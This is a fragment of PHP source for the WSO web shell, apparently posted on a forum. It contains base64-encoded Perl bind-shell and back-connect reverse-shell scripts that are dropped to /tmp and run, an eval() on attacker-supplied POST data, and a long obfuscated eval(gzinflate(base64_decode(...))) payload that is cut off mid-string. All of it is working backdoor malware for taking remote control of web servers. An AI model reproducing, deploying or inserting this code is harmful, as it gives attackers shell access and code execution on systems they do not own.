$back_connect_p = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
$bind_port_p = "IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
echo "<h1>Network tools</h1><div class=content>
<form name='nfp' onSubmit=\"g(null,null,'bpp',this.port.value);return false;\">
<span>Bind port to /bin/sh [perl]</span><br/>
Port: <input type='text' name='port' value='31337'> <input type=submit value='>>'>
</form>
<form name='nfp' onSubmit=\"g(null,null,'bcp',this.server.value,this.port.value);return false;\">
<span>Back-connect [perl]</span><br/>
Server: <input type='text' name='server' value='" . $_SERVER['REMOTE_ADDR'] . "'> Port: <input type='text' name='port' value='31337'> <input type=submit value='>>'>
</form><br>";
if (isset($_POST['p1'])) {
function cf($f, $t) {
$w = @fopen($f, "w") or @function_exists('file_put_contents');
if ($w) {
@fwrite($w, base64_decode($t));
@fclose($w);
}
}
if ($_POST['p1'] == 'bpp') {
cf("/tmp/bp.pl", $bind_port_p);
$out = wsoEx("perl /tmp/bp.pl " . $_POST['p2'] . " 1>/dev/null 2>&1 &");
sleep(1);
echo "<pre class=ml1>$out
" . wsoEx("ps aux | grep bp.pl") . "</pre>";
unlink("/tmp/bp.pl");
}
if ($_POST['p1'] == 'bcp') {
cf("/tmp/bc.pl", $back_connect_p);
$out = wsoEx("perl /tmp/bc.pl " . $_POST['p2'] . " " . $_POST['p3'] . " 1>/dev/null 2>&1 &");
sleep(1);
echo "<pre class=ml1>$out
" . wsoEx("ps aux | grep bc.pl") . "</pre>";
unlink("/tmp/bc.pl");
}
}
echo '</div>';
wsoFooter();
}
function actionRC() {
if (!@$_POST['p1']) {
$a = array("uname" => php_uname(), "php_version" => phpversion(), "wso_version" => WSO_VERSION, "safemode" => @ini_get('safe_mode'));
echo serialize($a);
} else {
eval($_POST['p1']);
}
}
if (empty($_POST['a'])) if (isset($default_action) && function_exists('action' . $default_action)) $_POST['a'] = $default_action;
else $_POST['a'] = 'SecInfo';
if (!empty($_POST['a']) && function_exists('action' . $_POST['a'])) call_user_func('action' . $_POST['a']);
exit;
Mã PHP:
preg_replace("/.*/e","eval(gzinflate(base64_decode('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